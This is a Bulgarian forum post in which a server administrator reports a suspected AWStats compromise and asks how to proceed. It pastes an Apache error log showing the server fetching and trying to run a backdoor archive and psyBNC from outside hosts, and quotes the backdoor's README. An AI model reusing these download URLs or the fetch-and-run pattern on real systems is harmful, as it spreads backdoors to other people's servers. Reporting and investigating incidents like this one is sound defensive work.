Здравейте :)
хоствам няколко сайта и ползвам awstats от 2г. като трафик анализатор за моя лична информция.
Днес в 22:04 стартирах awstats за пореден път за да анализира логовете на апача. Съвсем случайно по това време бях пуснал следната команда:
#tail -f /var/log/apache/*
и наблюдавах активността на сайтовете... Малко след като стартирах awstats се появи следното в error.log файла:
==== cut ====
sh: line 1: /awstats.mydomain.com.conf: No such file or directory
--22:04:48-- http://www.petry.se/public_html/tw.tar.gz
=> `tw.tar.gz'
Resolving www.petry.se... done.
Connecting to www.petry.se[195.47.247.72]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,414 [application/x-tar]
0K .......... ...... 100% 141.85 KB/s
22:04:48 (141.85 KB/s) - `tw.tar.gz' saved [16414/16414]
--22:04:51-- http://www.petry.se/public_html/tw.tar.gz
=> `tw.tar.gz'
Resolving www.petry.se... done.
Connecting to www.petry.se[195.47.247.72]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,414 [application/x-tar]
0K .......... ...... 100% 130.32 KB/s
22:04:52 (130.32 KB/s) - `tw.tar.gz' saved [16414/16414]
sh: line 1: cd: rw: No such file or directory
sh: line 1: ./bind: No such file or directory
sh: line 1: fg: no job control
--22:06:03-- http://geocities.com/sickady/p.tgz
=> `p.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605,272 [application/x-compressed]
0K .......... .......... .......... .......... .......... 8% 81.83 KB/s
50K .......... .......... .......... .......... .......... 16% 235.85 KB/s
100K .......... .......... .......... .......... .......... 25% 253.81 KB/s
150K .......... .......... .......... .......... .......... 33% 242.72 KB/s
200K .......... .......... .......... .......... .......... 42% 248.76 KB/s
250K .......... .......... .......... .......... .......... 50% 250.00 KB/s
300K .......... .......... .......... .......... .......... 59% 2.33 MB/s
350K .......... .......... .......... .......... .......... 67% 240.38 KB/s
400K .......... .......... .......... .......... .......... 76% 252.53 KB/s
450K .......... .......... .......... .......... .......... 84% 255.10 KB/s
500K .......... .......... .......... .......... .......... 93% 253.81 KB/s
550K .......... .......... .......... .......... . 100% 25.04 KB/s
22:06:08 (144.59 KB/s) - `p.tgz' saved [605272/605272]
tools/convconf.c: In function `cofile':
tools/convconf.c:81: warning: deprecated use of label at end of compound statement
gcc: installation problem, cannot exec `as': No such file or directory
make: *** [all] Error 1
./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory
sh: line 1: fg: no job control
--22:09:15-- http://geocities.com/sickady/p.tgz
=> `p.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605,272 [application/x-compressed]
0K .......... .......... .......... .......... .......... 8% 78.49 KB/s
50K .......... .......... .......... .......... .......... 16% 231.48 KB/s
100K .......... .......... .......... .......... .......... 25% 236.97 KB/s
150K .......... .......... .......... .......... .......... 33% 239.23 KB/s
200K .......... .......... .......... .......... .......... 42% 238.10 KB/s
250K .......... .......... .......... .......... .......... 50% 240.38 KB/s
300K .......... .......... .......... .......... .......... 59% 2.12 MB/s
350K .......... .......... .......... .......... .......... 67% 233.64 KB/s
400K .......... .......... .......... .......... .......... 76% 238.10 KB/s
450K .......... .......... .......... .......... .......... 84% 252.53 KB/s
500K .......... .......... .......... .......... .......... 93% 255.10 KB/s
550K .......... .......... .......... .......... . 100% 1.11 MB/s
22:09:18 (230.17 KB/s) - `p.tgz' saved [605272/605272]
./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory
sh: line 1: fg: no job control
==== /cut ====
Сами виждате - нещо изтегли и се опита да инсталира следните пакети при това по 2 пъти:
1. http://www.petry.se/public_html/tw.tar.gz
2. http://geocities.com/sickady/p.tgz
Аз смятам че има връзка с awstats защотото, освен че се появи малко след стартиране на австатс (няколко секунди), забележете ред 1 от това което Ви пейстнах:
sh: line 1: /awstats.mydomain.com.conf: No such file or directory
Какво е това? Задна врата в австатс? или уязвимост в австатс?
аз изтеглих въпросните 2 пакета и в README файла на tw.tar.gz пише следното:
59768 port backdoor
no password needed , easy to install and hiding from ps and ps ax:D
have phun !
wget at home.ro
Другия пакет се оказа че е psybnc. Незнам за какво служи.
То и от последния ред който пейстнах там по-горе се вижда това:
./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory
sh: line 1: fg: no job control
Всичко това стана пред очите ми.
изпълних
updatedb
locate psybnc
locate p.tgz
locate tw.tar.gz
locate tools/convconf.c
locate convconf.c
и никоя от тях не намери нищо.
в логовете открих точно по същото време изпратени 2 мейла:
from <anonymous@xxxxxxxxxxxx> to remote textercrew@xxxxxxxxx
from <anonymous@xxxxxxxxxxxx> to remote TwiNkieonline@xxxxxxxxx
Търсих, рових.... не намерих нищо друго подозрително!
Сървъра е apache 1.3.33
Вие какво мислите? как да процедирам?
Благодаря за помощта!